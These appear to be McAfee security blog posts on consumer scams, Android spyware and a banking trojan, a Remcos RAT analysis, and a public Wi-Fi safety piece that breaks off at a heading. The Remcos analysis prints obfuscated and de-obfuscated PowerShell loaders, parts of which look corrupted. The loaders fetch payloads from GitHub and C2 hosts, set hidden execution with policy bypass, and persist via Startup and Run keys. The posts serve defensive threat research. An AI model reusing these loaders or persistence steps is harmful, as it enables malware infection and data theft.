Brushing scams are a type of online fraud where sellers send unsolicited packages to individuals, even though they never made an order. These deceptive tactics are often used on popular e-commerce platforms such as Amazon and AliExpress. The goal of scammers is to artificially inflate product rankings and create fake reviews, ultimately boosting their sales and visibility. Read on to understand how brushing scams work and what steps you can take to stay safe.

What Is a Brushing Scam?

A brushing scam is a fraudulent practice in which sellers send packages to people without their knowledge or consent. These items are typically cheap and low-quality, such as inexpensive jewelry or random gadgets, and are sent to fake addresses or addresses obtained illegally. Once the item is delivered, the fraudster writes a fake review praising the product, which helps the seller’s rating rise.

Why Is It Called a “Brushing” Scam?

The term “brushing” originates from Chinese e-commerce, where the act of “brushing up” sales numbers involves creating fake orders and sending goods to random individuals. This practice boosts a product’s perceived popularity, tricking other buyers into thinking the product is highly rated, thus increasing its sales.

How Do Brushing Scams Work?

Here’s how a brushing scam typically unfolds:

• The scammer creates a fake account on an e-commerce platform.
• They place an order for their own product using an address they’ve obtained illegitimately.
• A cheap product, such as a low-quality ring or fake electronic device, is sent to the recipient.
• Once the package arrives, the scammer posts a glowing review under their fake account to make the product appear more legitimate.

These scammers often send products like costume jewelry, seeds, or inexpensive gadgets to inflate their reviews and rankings. If you find an unsolicited package at your door, there’s a high chance it’s part of a brushing scam.

The Risks of Brushing Scams

Personal Data Exposure:

Receiving unsolicited parcels may indicate that your personal information has been compromised. Scammers typically access names and addresses through data breaches or purchase this information from illegal sources. In some cases, they may possess additional sensitive details, opening the door to identity theft.

Account Suspension:

If a fraudster uses your name to write fake reviews, your e-commerce account could be flagged or suspended by the platform while the issue is investigated.

Misleading Consumers:

Fake reviews can mislead you into purchasing low-quality products, especially when inflated ratings and positive comments are posted en masse.

Safety Hazards:

Some items involved in brushing scams, such as cosmetics, could be harmful. Other items, like flower seeds, may pose biosecurity risks or introduce invasive species to your local ecosystem.

Reporting a Brushing Scam

If you’ve received an unexpected package and suspect it’s part of a brushing scam, report it to the online marketplace involved. Platforms typically provide a form for users to submit reports on fraudulent packages. Here’s how to handle it:

• Log into your account and locate the report section.
• If the package is not a gift, and the platform has no record of it, it’s likely part of a scam.
• Fill out the form and submit the details about the package.

You can also report the incident to your local consumer protection agency or, in the case of U.S. residents, to the Federal Trade Commission (FTC).

How to Handle an Amazon Brushing Scam

If the scam occurs on Amazon, follow these steps:

• Log into your Amazon account.
• Navigate to the “Report Unsolicited Package” section.
• Provide the relevant details, such as tracking number and a description of the package.
• Amazon will investigate, and it may take up to 10 days to receive an update.

It’s important not to consume or use the product, especially if its quality is questionable or if it’s an item like cosmetics or food. Update your passwords for Amazon and any linked accounts and monitor your financial statements for suspicious activity.

Protecting Yourself from Brushing Scams

Here are some steps to prevent falling victim to brushing scams:

• Secure Your Accounts:
  Update your passwords regularly and enable two-factor authentication for added security.
• Report Unsolicited Packages:
  If you receive a package you didn’t order, immediately report it to the platform where it came from.
• Verify Seller Reviews:
  Before buying from a new seller, scrutinize their reviews. Genuine reviews often contain specific details about the product or shipping process, while fake reviews tend to be more generic.
• Stick to Reputable Sellers:
  Always buy from trusted sellers with long-standing accounts. Inspect their product images carefully to avoid fake or misleading listings.

Why Am I Receiving Unordered Packages from China?

If you receive unexpected items from China or other overseas locations, it could be a sign of a brushing scam, especially if the items appear low-quality or irrelevant.

What Should I Do If I Get an Unknown Package from USPS?

If you receive a package you didn’t order via USPS:

• Contact USPS immediately.
• If unopened, mark the package “Return to sender” for free return.
• If you also receive a phishing email, report it as well.

Brushing scams are a growing concern, but by staying vigilant and taking appropriate steps, you can protect your personal information and avoid falling prey to these deceptive tactics. Always report suspicious packages and reviews, and be cautious when interacting with unfamiliar sellers.

The post How to Protect Yourself from a Brushing Scam appeared first on McAfee Blog.

Authored by Wenfeng Yu and ZePeng Chen

As smartphones have become an integral part of our daily lives, malicious apps have grown increasingly deceptive and sophisticated. Recently, we uncovered a seemingly harmless app called “BMI CalculationVsn” on the Amazon App Store, which is secretly stealing the package name of installed apps and incoming SMS messages under the guise of a simple health tool. McAfee reported the discovered app to Amazon, which took prompt action, and the app is no longer available on Amazon Appstore.

Figure 1. Application published on Amazon Appstore

Superficial Functionality: Simple BMI Calculation

On the surface, this app appears to be a basic tool, providing a single page where users can input their weight and height to calculate their BMI. Its interface looks entirely consistent with a standard health application. However, behind this innocent appearance lies a range of malicious activities.

Figure 2. Application MainActivity

Malicious Activities: Stealing Private Data

Upon further investigation, we discovered that this app engages in the following harmful behaviors:

1. Screen Recording: The app starts a background service to record the screen and when the user clicks the “Calculate” button, the Android system will pop up request screen recording permission message and start screen recording. This functionality is likely to capture gesture passwords or sensitive data from other apps. In the analysis of the latest existing samples, it was found that the developer was not ready for this function. The code did not upload the recorded mp4 file to the C2 server, and at the beginning of the startRecording() method, the developer added a code that directly returns and does not execute follow code.

Figure 3. Screen Recorder Service Code

When the recording starts, the permission request dialog will be displayed.

Figure 4. Start Recording Request.

2. Installed App Information: The app scans the device to retrieve a list of all installed applications. This data could be used to identify target users or plan more advanced attacks.

Figure 5. Upload User Data

3. SMS Messages: It intercepts and collects all SMS messages received on the device, potentially to capture one-time password (OTP), verification codes and sensitive information. The intercepted text messages will be added to Firebase (storage bucket: testmlwr-d4dd7.appspot.com).

Malware under development:

According to our analysis of historical samples, this malicious app is still under development and testing stage and has not reached a completed state. By searching for related samples on VirusTotal based on the malware’s package name (com.zeeee.recordingappz) revealed its development history. We can see that this malware was first developed in October 2024 and originally developed as a screen recording app, but midway through the app’s icon was changed to the BMI calculator, and the payload to steal SMS messages was added in the latest version.

Figure 6. The Timeline of Application Development

The address of the Firebase Installation API used by this app uses the character “testmlwr” which indicates that this app is still in the testing phase.

App Developer Information:

According to the detailed information about this app product on the Amazon page, the developer’s name is: “PT. Visionet Data Internasional”. The malware author tricked users by abusing the names of an enterprise IT management service provider in Indonesia to distribute this malware on Amazon Appstore. This fact suggests that the malware author may be someone with knowledge of Indonesia.

Figure 7. Developer Information

How to Protect Yourself

To avoid falling victim to such malicious apps, we recommend the following precautions:

1. Install Trusted Antivirus Apps: Use reliable antivirus software to detect and prevent malicious apps before they can cause harm.
2. Review Permission Requests: When installing an app, carefully examine the permissions it requests. Deny any permissions that seem unrelated to its advertised functionality. For instance, a BMI calculator has no legitimate reason to request access to SMS or screen recording.
3. Stay Alert: Watch for unusual app behavior, such as reduced device performance, rapid battery drain, or a spike in data usage, which could indicate malicious activity running in the background.

Conclusion

As cybercrime continues to evolve, it is crucial to remain vigilant in protecting our digital lives. Apps like “BMI CalculationVsn” serve as a stark reminder that even the simplest tools can harbor hidden threats. By staying alert and adopting robust security measures, we can safeguard our privacy and data.

IoC

Distribution website:

• hxxps://www.amazon.com/PT-Visionet-Data-Internasional-CalculationVsn/dp/B0DK1B7ZM5/

C2 servers/Storage buckets:

• hxxps://firebaseinstallations.googleapis.com/v1/projects/testmlwr-d4dd7
• hxxps://6708c6e38e86a8d9e42ffe93.mockapi.io/
• testmlwr-d4dd7.appspot.com

Sample Hash:

• 8477891c4631358c9f3ab57b0e795e1dcf468d94a9c6b6621f8e94a5f91a3b6a

The post Spyware distributed through Amazon Appstore appeared first on McAfee Blog.

Authored by Dexter Shin

Over the years, cyber threats targeting Android devices have become more sophisticated and persistent. Recently, McAfee Mobile Research Team discovered a new Android banking trojan targeting Indian users. This malware disguises itself as essential services, such as utility (e.g., gas or electricity) or banking apps, to get sensitive information from users. These types of services are vital for daily life, making it easier to lure users. We have previously observed malware that masquerades as utility services in Japan. As seen in such cases, utility-related messages, such as warnings that gas service will disconnect soon unless the bill is checked, can cause significant alarm and prompt immediate action from the users.

We have identified that this malware has infected 419 devices, intercepted 4,918 SMS messages, and stolen 623 entries of card or bank-related personal information. Given the active malware campaigns, these numbers are expected to rise. McAfee Mobile Security already detects this threat as Android/Banker. For more information, visit McAfee Mobile Security

Phishing through messaging platforms like WhatsApp

As of 2024, India is the country with the highest number of monthly active WhatsApp users. This makes it a prime target for phishing attacks. We’ve previously introduced another Banker distributed via WhatsApp. Similarly, we suspect that the sample we recently found also uses messaging platforms to reach individual users and trick them into installing a malicious APK. If a user installs this APK, it will allow attackers to steal the victim’s financial data, thereby accomplishing their malicious goal.

Figure 1. Scammer messages reaching users via Whatsapp (source: reddit)

Inside the malware

The malware we first identified was pretending to be an app that allowed users to pay their gas bills. It used the logo of PayRup, a digital payment platform for public service fees in India, to make it look more trustworthy to users.

Figure 2. Malware disguised as gas bills digital payment app

Once the app is launched and the permissions, which are designed to steal personal data such as SMS messages, are granted, it asks the user for financial information, such as card details or bank account information. Since this malware pretends to be an app for paying bills, users are likely to input this information to complete their payments. On the bank page, you can see major Indian banks like SBI and Axis Bank listed as options.

Figure 3. Malware that requires financial data

If the user inputs their financial information and tries to make a payment, the data is sent to the command and control (C2) server. Meanwhile, the app displays a payment failure message to the user.

Figure 4. Payment failure message displayed but data sent to C2 server

One thing to note about this app is that it can’t be launched directly by the user through the launcher. For an Android app to appear in the launcher, it needs to have “android.intent.category.LAUNCHER” defined within an <intent-filter> in the AndroidManifest.xml. However, since this app doesn’t have that attribute, its icon doesn’t appear. Consequently, after being installed and launched from a phishing message, users may not immediately realize the app is still installed on their device, even if they close it after seeing messages like “Bank Server is Down”, effectively keeping it hidden.

Figure 5. AndroidManifest.xml for the sample

Exploiting Supabase for data exfiltration

In previous reports, we’ve introduced various C2 servers used by malware. However, this malware stands out due to its unique use of Supabase, an open-source database service. Supabase is an open-source backend-as-a-service, similar to Firebase, that provides PostgreSQL-based database, authentication, real-time features, and storage. It helps developers quickly build applications without managing backend infrastructure. Also, it supports RESTful APIs to manage their database. This malware exploits these APIs to store stolen data.

Figure 6. App code using Supabase

A JWT (JSON Web Token) is required to utilize Supabase through its RESTful APIs. Interestingly, the JWT token is exposed in plain text within the malware’s code. This provided us with a unique opportunity to further investigate the extent of the data breach. By leveraging this token, we were able to access the Supabase instance used by the malware and gain valuable insights into the scale and nature of the data exfiltration.

Figure 7. JWT token exposed in plaintext

During our investigation, we discovered a total of 5,558 records stored in the database. The first of these records was dated October 9, 2024. As previously mentioned, these records include 4,918 SMS messages and 623 entries of card information (number, expiration date, CVV) and bank information (account numbers, login credentials like ID and password).

Figure 8. Examples of stolen data

Uncovering variants by package prefix

The initial sample we found had the package name “gs_5.customer”. Through investigation of their database, we identified 8 unique package prefixes. These prefixes provide critical clues about the potential scam themes associated with each package. By examining the package names, we can infer specific characteristics and likely focus areas of the various scam operations.

Based on the package names, it seems that once a scam theme is selected, at least 2 different variants are developed within that theme. This variability not only complicates detection efforts but also increases the potential reach and impact of their scam campaigns.

Mobile app management of C2

Based on the information uncovered so far, we found that the malware actor has developed and is actively using an app to manage the C2 infrastructure directly from a device. This app can send commands to forward SMS messages from the victim’s active phones to specified numbers. This capability differentiates it from previous malware, which typically manages C2 servers via web interfaces. The app stores various configuration settings through Firebase. Notably, it utilizes Firebase “Realtime Database” rather than Firestore, likely due to its simplicity for basic data retrieval and storage.

Figure 9. C2 management mobile application

Conclusion

Based on our research, we have confirmed that 419 unique devices have already been infected. However, considering the continual development and distribution of new variants, we anticipate that this number will steadily increase. This trend underscores the persistent and evolving nature of this threat, emphasizing the need for careful observation and flexible security strategies.

As mentioned at the beginning of the report, many scams originate from messaging platforms like WhatsApp. Therefore, it’s crucial to remain cautious when receiving messages from unknown or uncertain sources. Additionally, given the clear emergence of various variants, we recommend using security software that can quickly respond to new threats. Furthermore, by employing McAfee Mobile Security, you can bolster your defense against such sophisticated threats.

Indicators of Compromise (IOCs)

APKs:

Domains:

• https[://]luyagyrvyytczgjxwhuv.supabase.co

Firebase:

• https[://]call-forwarder-1-default-rtdb.firebaseio.com

The post A New Android Banking Trojan Masquerades as Utility and Banking Apps in India appeared first on McAfee Blog.

McAfee threat researchers have identified several consumer brands and product categories most frequently used by cybercriminals to trick consumers into clicking on malicious links in the first weeks of this holiday shopping season. As holiday excitement peaks and shoppers hunt for the perfect gifts and amazing deals, scammers are taking advantage of the buzz. The National Retail Federation projects holiday spending will reach between $979.5 and $989 billion this year, and cybercriminals are capitalizing by creating scams that mimic the trusted brands and categories consumers trust. From October 1 to November 12, 2024, McAfee safeguarded its customers from 624,346 malicious or suspicious URLs tied to popular consumer brand names – a clear indication that bad actors are exploiting trusted brand names to deceive holiday shoppers. 

McAfee’s threat research also reveals a 33.82% spike in malicious URLs targeting consumers with these brands’ names in the run-up to Black Friday and Cyber Monday. This rise in fraudulent activity aligns with holiday shopping patterns during a time when consumers may be more susceptible to clicking on offers from well-known brands like Apple, Yeezy, and Louis Vuitton, especially when deals seem too good to be true – pointing to the need for consumers to stay vigilant, especially with offers that seem unusually generous or come from unverified sources.  

McAfee threat researchers have identified a surge in counterfeit sites and phishing scams that use popular luxury brands and tech products to lure consumers into “deals” on fake e-commerce sites designed to appear as official brand pages. While footwear and handbags were identified as the top two product categories exploited by cybercrooks during this festive time, the list of most exploited brands extends beyond those borders: 

Top Product Categories and Brands Targeted by Holiday Hustlers 

• Product categories: Handbags and footwear were the two most common product categories for bad actors. Yeezy (shoes) and Louis Vuitton (luxury handbags) were the most common brands that trick consumers into engaging with malicious/suspicious sites. 

• Footwear: Adidas, especially the Yeezy line, was a top target, with counterfeit sites posing as official Adidas or Yeezy outlets. 

• Luxury goods and handbags: Louis Vuitton emerged as a frequent target, particularly its handbag line. Cybercrooks frequently set up fake sites advertising high-demand luxury items like Louis Vuitton bags and apparel. 

• Watches: Rolex was one of the most frequently counterfeited brands, with fraudulent sites openly selling counterfeit versions of the brand’s coveted watches. 

• Technology: Scammers frequently used the Apple brand to trick consumers, including fake customer service websites and stores selling counterfeit Apple items alongside unrelated brands. 

By mimicking trusted brands like these, offering unbelievable deals, or posing as legitimate customer service channels, cybercrooks create convincing traps designed to steal personal information or money. Here are some of the most common tactics scammers are using this holiday season: 

Unwrapping Cybercriminals’ Holiday Shopping Scam Tactics 

• Fake e-commerce sites: Scammers often set up fake shopping websites mimicking official brand sites. These sites use URLs similar to those of the real brand and offer too-good-to-be-true deals to attract bargain hunters. 

• Phishing sites with customer service bait: Particularly with tech brands like Apple, some scam sites impersonate official customer service channels to lure customers into revealing personal information. 

• Knockoff and counterfeit products: Some scam sites advertise counterfeit items as if they are real; there is often no indication that they are not legitimate products. This tactic was common for scammers leveraging the Rolex and Louis Vuitton brands, which appeal to consumers seeking luxury goods. 

 With holiday shopping in full swing, it’s essential for consumers to stay one step ahead of scammers. By understanding the tactics cybercriminals use and taking a few precautionary measures, shoppers can protect themselves from falling victim to fraud. Here are some practical tips for safe shopping this season: 

Smart Shopping Tips to Outsmart Holiday Scammers 

• Stay alert, particularly during shopping scam season: The increase in malicious URLs during October and November is a strong indicator that scammers capitalize on holiday shopping behaviors. Consumers should be especially vigilant during this period and continue to exercise caution throughout the holiday shopping season. 

• Wear a skeptic’s hat: To stay safe, consumers should verify URLs, look for signs of secure websites (like https://), and be wary of any sites offering discounts that seem too good to be true. 

• Exercise additional caution: Adidas, Yeezy, Louis Vuitton, Apple, and Rolex are brand names frequently used by cybercrooks looking to scam consumers, so sticking with trusted sources is particularly important when shopping for these items online. 

Research Methodology 

McAfee’s threat research team analyzed malicious or suspicious URLs that McAfee’s web reputation technology identified as targeting customers, by using a list of key company and product brand names—based on insights from a Potter Clarkson report on frequently faked brands—to query the URLs. This methodology captures instances where users either clicked on or were directed to dangerous sites mimicking trusted brands. Additionally, the team queried anonymized user activity from October 1st through November 12th. 

Examples: 

The image below is a screenshot of a fake / malicious / scam site: Yeezy is a popular product brand formerly from Adidas found in multiple Malicious/Suspicious URLs. Often, they present themselves as official Yeezy and/or Adidas shopping sites. 

The image below is a screenshot of a fake / malicious / scam site: The Apple brand was a popular target for scammers. Many sites were either knock offs, scams, or in this case, a fake customer service page designed to lure users into a scam. 

The image below is a screenshot of a fake / malicious / scam site: This particular (fake) Apple sales site used Apple within its URL and name to appear more official. Oddly, this site also sells Samsung Android phones. 

The image below is a screenshot of a fake / malicious / scam site: This site, now taken down, is a scam site purporting to sell Nike shoes. 

The image below is a screenshot of a fake / malicious / scam site: Louis Vuitton is a popular brand for counterfeit and scams. Particularly their handbags. Here is one site that was entirely focused on Louis Vuitton Handbags. 

The image below is a screenshot of a fake / malicious / scam site: This site presents itself as the official Louis Vuitton site selling handbags and clothes. 

The image below is a screenshot of a fake / malicious / scam site: This site uses too-good-to-be-true deals on branded items including this Louis Vuitton Bomber jacket. 

The image below is a screenshot of a fake / malicious / scam site: Rolex is a popular watch brand for counterfeits and scams. This site acknowledges it sells counterfeits and makes no effort to indicate this on the product.  

The post This Holiday Season, Watch Out for These Cyber-Grinch Tricks Used to Scam Holiday Shoppers appeared first on McAfee Blog.

Authored By Sakshi Jaiswal, Anuradha M

In Q3 2024, McAfee Labs identified a sharp rise in the Remcos RAT threat. It has emerged as a significant threat in the world of cybersecurity, gaining traction with its ability to infiltrate systems and compromise sensitive data. This malware, often delivered through phishing emails and malicious attachments, allows cybercriminals to remotely control infected machines, making it a powerful tool for espionage, data theft, and system manipulation. As cyberattacks become more sophisticated, understanding the mechanisms behind RemcosRAT and adopting effective security measures are crucial to protecting your systems from this growing threat. This blog presents a technical analysis of two RemcosRAT variants

The heat map below illustrates the prevalence of Remcos in the field in Q3,2024

Variant 1:

In the first variant of Remcos, executing a VBS file triggers a highly obfuscated PowerShell script that downloads multiple files from a command-and-control (C2) server. These files are then executed, ultimately leading to their injection into RegAsm.exe, a legitimate Microsoft .NET executable.

Infection Chain

Analysis:

Executing the VBS file initially triggers a Long-Obfuscated PowerShell command.

It uses multi-layer obfuscation, and after de-obfuscation, below is the final readable content.

The de-obfuscated PowerShell script performs the following actions:

1. Firstly, the script checks if the PowerShell version is 2.0. then the file will be downloaded from Googledrive “’https://drive.google.com/uc?export=download&id=‘“ in Temp location. and if PowerShell version is not 2.0 then it downloads string from ftp server.
2. It creates a copy of itself in the startup location – \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

3. In this case, since the PowerShell version is not 2.0, it will download strings from the FTP server.
4. Uses FTP to download DLL01.txt file, from “ftp://[email protected]/Upcrypter/01/DLL01.txt” with the username:desckvbrat1 and password: *******************as mentioned in the PowerShell script. Using FileZilla with the provided username and password to download files.

5. It has 3 files DLL01.txt, Entry.txt and Rumpe.txt, which contains a URL that provides direct access to a snippet hosted on the PasteCode.io platform.

DLL01.txt File

Rumpe.txt String

Figure 11: Snippet which is hosted on PasteCode.io of Rumpe.txt

The snippet above is encoded, Decoding it generates ClassLibrary1.dll file.

Entry.txt

1. Last line of long PowerShell script – [System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType(‘ClassLibrary3.Class1’).GetMethod( ‘prFVI’ ).Invoke( $null , [object[]] ( ‘txt.sz/moc.gnitekrame-uotenok//:sptth‘ , $hzwje , ‘true’ ) ); This line loads a .NET assembly into the current application domain and invokes it.
2. “txt.sz/moc.gnitekrame-uotenok//:sptth” The string is a reversed URL. When reversed, it becomes: https://koneotemarket.com/zst.txt. The raw data hosted in that location is base64 encoded and stored in reversed order. Once decoded and reversed, the content is invoked for execution.

1. After invocation, it creates a directory in AppData/Local/Microsoft, specifically within the LocalLow folder. It then creates another folder named “System Update” and places three files inside it.

The LocalLow folder is a directory in Windows used to store application data that requires low user permissions. It is located within the AppData folder. The two paths below show how the malware is using a very similar path to this legitimate windows path.

legitimate Path: C:\Users\<YourUsername>\AppData\LocalLow

Mislead Path: C:\Users\<YourUsername>\AppData\Local\Microsoft\LocalLow

In this case, a LocalLow folder has been created inside the Microsoft directory to mislead users into believing it is a legitimate path for LocalLow.

A screenshot of the files dropped into the System Update folder within the misleading LocalLow directory highlights the tactic used to mimic legitimate Windows directories, intending to evade user suspicion.

Content of x3.txt

Then x2.ps1 is executed. Content of x2.ps1

The command adds a new registry entry in the Run key of the Windows Registry under HKCU (HKEY_CURRENT_USER). This entry ensures that a PowerShell script (yrnwr.ps1) located in the System Update folder inside the misleading LocalLow directory is executed at every user login.

After adding registry entry, it executes yrnwr.ps1 file. Content of yrnwr.ps1 which is obfuscated.

After Decoding yrnwr.ps1

It utilizes a process injection technique to inject the final Remcos payload into the memory of RegAsm.exe, a legitimate Microsoft .NET executable.

Memory String of RegAsm.exe which shows the traces of Remcos

Mutex Created

A log file is stored in the %ProgramData% directory, where a folder named “1210” is created. Inside this folder, a file called logs.dat is generated to capture and store all system logging activities.

Finally, it deletes the original VBS sample from the system.

Variant 2 – Remcos from Office Open XML Document:

This variant of Remcos comes from Office Open XML Document. The docx file comes from a spam email as an attachment.

Infection Chain:

Email Spam:

The email displayed in the above image contains an attachment in the form of a .docx file, which is an Office Open XML document.

Analysis:

From the static analysis of .docx file, it is found that the malicious content was present in the relationship file “setting.xml.rels”. Below is the content of settings.xml.rels file:

From the above content,it is evident that it downloads a file from an external resource which points to a URL hxxps://dealc.me/NLizza.

The downloaded file is an RTF document named “seethenewthingswhichgivenmebackwithentirethingstobegetbackonlinewithentirethingsbackwithentirethinsgwhichgivenmenewthingsback_______greatthingstobe.doc”which has an unusually long filename.

The RTF file is crafted to include CVE-2017-11882 Equation Editor vulnerability which is a remote code execution vulnerability that allows an attacker to execute arbitrary code on a victim’s machine by embedding malicious objects in documents.

Upon execution, the RTF file downloads a VBS script from the URL “hxxp://91.134.96.177/70/picturewithmegetbacktouse.tIF” to the %appdata% directory, saving it as “picturewithmegetbacktouse.vbs”.

Below is the content of VBS file:

The VBScript is highly obfuscated, employing multiple layers of string concatenation to construct a command. It then executes that command using WScript.Shell.3ad868c612a6

Below is the de-obfuscated code:

The above code shows that the VBS file launches PowerShell using Base64 encoded strings as the command.

Below is the 1st PowerShell command line:

“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -command $Codigo = ‘LiAoIChbc3RyaW5HXSR2ZXJCT1NFUFJFZmVSRU5jRSlbMSwzXSsneCctam9JTicnKSgoKCd7MH11cmwgJysnPSB7Mn1odHRwczovLycrJ3JhJysndy4nKydnaScrJ3QnKydodScrJ2J1Jysnc2VyJysnY29uJysndGVuJysndCcrJy5jb20vTm8nKydEJysnZScrJ3QnKydlYycrJ3RPbi9Ob0RldCcrJ2VjdCcrJ09uL3JlZicrJ3MnKycvJysnaGVhZHMvbWFpbi9EZXRhaCcrJ05vJysndCcrJ2gnKyctVicrJy50eHR7MicrJ307JysnIHswfWJhJysnc2UnKyc2JysnNEMnKydvbnQnKydlJysnbicrJ3QgPSAnKycoTmV3JysnLU9iaicrJ2UnKydjJysndCBTeXMnKyd0ZW0uTmUnKyd0LicrJ1dlYicrJ0MnKydsaWVudCkuRCcrJ28nKyd3bmwnKydvYScrJ2RTdHInKydpbicrJ2coJysneycrJzB9dScrJ3JsKTsgeycrJzAnKyd9JysnYmluYXJ5QycrJ29udGUnKyduJysndCA9JysnICcrJ1tTJysneXN0JysnZW0uQ28nKydudmUnKydydCcrJ10nKyc6OkYnKydyb21CYXNlNjRTdHJpbicrJ2coezB9YmFzZScrJzYnKyc0QycrJ29udGUnKydudCcrJyknKyc7IHsnKycwfScrJ2FzcycrJ2UnKydtYmx5JysnID0nKycgWycrJ1JlZmxlY3QnKydpb24uQXNzZW1ibCcrJ3ldJysnOjpMJysnbycrJ2FkKHswfWJpbicrJ2FyeUMnKydvbicrJ3QnKydlbnQpOyBbZG5saScrJ2IuSU8uSG9tJysnZScrJ106OlZBSSh7JysnMX0nKyd0JysneCcrJ3QuJysnQ1ZGR0dSLzA3Lzc3JysnMS42OS4nKyc0MycrJzEuMScrJzkvLycrJzpwJysndHRoezEnKyd9LCB7JysnMScrJ30nKydkZXNhdGl2YWRvezEnKyd9LCB7MX1kZXMnKydhdGknKyd2YWQnKydvezF9LCB7MX1kZXMnKydhdCcrJ2knKyd2YWRvezF9LCcrJyB7MScrJ31SZScrJ2dBJysncycrJ217JysnMX0sJysnIHsnKycxfXsnKycxfSwnKyd7MX17MX0pJyktZiAgW2NIYVJdMzYsW2NIYVJdMzQsW2NIYVJdMzkpICk=’;$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Base64 decoded content:

The above base64 decoded content is used as input to the 2nd PowerShell command.

Below is the 2nd PowerShell command line:

“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -windowstyle hidden -executionpolicy bypass -NoProfile -command “. ( ([strinG]$verBOSEPREfeRENcE)[1,3]+’x’-joIN”)(((‘{0}url ‘+’= {2}https://’+’ra’+’w.’+’gi’+’t’+’hu’+’bu’+’ser’+’con’+’ten’+’t’+’.com/No’+’D’+’e’+’t’+’ec’+’tOn/NoDet’+’ect’+’On/ref’+’s’+’/’+’heads/main/Detah’+’No’+’t’+’h’+’-V’+’.txt{2’+’};’+’ {0}ba’+’se’+’6’+’4C’+’ont’+’e’+’n’+’t = ‘+'(New’+’-Obj’+’e’+’c’+’t Sys’+’tem.Ne‘+’t.’+’Web’+’C’+’lient).D’+’o’+’wnl’+’oa’+’dStr’+’in’+’g(‘+'{‘+’0}u’+’rl); {‘+’0’+’}’+’binaryC’+’onte’+’n’+’t =’+’ ‘+'[S’+’yst’+’2024 – New ‘+’nve’+’rt’+’]’+’::F’+’romBase64Strin’+’g({0}base’+’6’+’4C’+’onte’+’nt’+’)’+’; {‘+’0}’+’ass’+’e’+’mbly’+’ =’+’ [‘+’Reflect’+’ion.Assembl’+’y]’+’::L’+’o’+’ad({0}bin’+’aryC’+’on’+’t’+’ent); [dnli’+’b.IO.Hom’+’e’+’]::VAI({‘+’1}’+’t’+’x’+’t.’+’CVFGGR/07/77’+’1.69.’+’43’+’1.1’+’9//’+’:p’+’tth{1’+’}, {‘+’1’+’}’+’desativado{1’+’}, {1}des’+’ati’+’vad’+’o{1}, {1}des’+’at’+’i’+’vado{1},’+’ {1’+’}Re’+’gA’+’s’+’m{‘+’1},’+’ {‘+’1}{‘+’1},’+'{1}{1})’)-f [cHaR]36,[cHaR]34,[cHaR]39) )”

• The PowerShell script uses string obfuscation by combining parts of strings using join and concatenation. This hides the actual URL being fetched.
• It constructs a URL that points to a raw GitHub file: hxxps://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

Below is the content of “DetahNoth-V.txt”:

Below is the code snippet to decode the above Base64 string into binary format and load it into memory as a .NET assembly. This method avoids writing files to disk, which makes it harder for some security products to detect the operation.

The decoded binary content leads to a DLL file named as “dnlib.dll”.

Below is the last part of code in the 2nd PowerShell command line:

Once the assembly “dnlib.dll” is loaded, it calls a method VAI from a type dnlib.IO.Home within the loaded assembly. This method is invoked with several arguments:

• txt.CVFGGR/07/771.69.431.19//:ptth: This is a reversed URL (hxxp://91.134.96.177/70/RGGFVC.txt) that might point to another resource.
• desativado (translated from Portuguese as “deactivated”): Passed multiple times as arguments. This is used as a parameter for deactivating certain functions.
• RegAsm: This is the name of the .NET assembly registration tool, potentially indicating that the script is registering or working with assemblies on the machine.

Below is the content of URL -hxxp://91.134.96.177/70/RGGFVC.txt:

The content shown above is a reversed, Base64-encoded binary payload, which, when decoded, results in the Remcos EXE payload.

Indicators of Compromise (IOCs)

Variant 1

Variant 2

URLs

Detections:

Variant 1

Variant 2

Conclusion

In conclusion, the rise of Remcos RAT highlights the evolving nature of cyber threats and the increasing sophistication of malware. As this remote access Trojan continues to target consumers through phishing emails and malicious attachments, the need for proactive cybersecurity measures has never been more critical. By understanding the tactics used by cybercriminals behind Remcos RAT and implementing robust defenses such as regular software updates, email filtering, and network monitoring, organizations can better protect their systems and sensitive data. Staying vigilant and informed about emerging threats like Remcos RAT is essential in safeguarding against future cyberattacks.

References

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/from-email-to-rat-deciphering-a-vb-script-driven-campaign/

The post The Stealthy Stalker: Remcos RAT appeared first on McAfee Blog.

Winter travel is filled with excitement—whether you’re heading to a snow-covered ski resort, visiting family for the holidays, or enjoying a cozy retreat in a picturesque town. According to Tripadvisor’s Winter Travel Index, 57% of Americans are gearing up for winter travel this year, with a staggering 96% planning to travel as much or more than they did last winter. Yet, with this seasonal joy comes a hidden danger: public Wi-Fi. Airports, hotels, coffee shops, and even ski lodges offer free Wi-Fi, making it easy to stay connected while on the go. But while these networks are convenient, they can also be risky.

Common threats include Man-in-the-Middle attacks, where hackers intercept data exchanged between your device and the Wi-Fi network, and rogue hotspots, where cybercriminals set up fake Wi-Fi networks with names that mimic legitimate ones, tricking users into connecting. 

Despite these risks, many travelers still connect to public Wi-Fi without taking the necessary precautions. But with a few simple steps, you can significantly reduce your exposure while traveling this winter.

1. Use a Virtual Private Network (VPN): Your Best Defense

The most effective way to protect your data on public Wi-Fi is by using a Virtual Private Network (VPN). A VPN encrypts your internet connection, making it virtually impossible for hackers to intercept your data. It creates a secure tunnel between your device and the internet, ensuring that your online activity remains private.

By encrypting your data, a VPN ensures that any information transmitted over the network is unreadable to anyone attempting to intercept it, such as hackers or cybercriminals. It also masks your IP address, adding a layer of anonymity that makes it difficult for snoopers to trace your online movements or identify your location. 

2. Avoid Sensitive Transactions on Public Wi-Fi

Even with a VPN, it’s wise to avoid performing sensitive transactions on public Wi-Fi networks. For activities like online banking, shopping with credit cards, or accessing sensitive work documents, it’s best to reserve those tasks for secure, private networks. Taking a few extra precautions can further reduce your risk of data theft. 

Safer Alternatives:

• Use Mobile Data: When possible, switch to your mobile data connection for sensitive transactions. Cellular networks are generally more secure than public Wi-Fi. 
• Wait Until You’re Home: If the transaction isn’t urgent, wait until you can connect to a trusted, secure network. 
• Use Secure Apps: If you must access sensitive accounts, use their official mobile apps instead of a web browser. Apps often have built-in security features that browsers lack.

3. Spot Suspicious Wi-Fi Networks

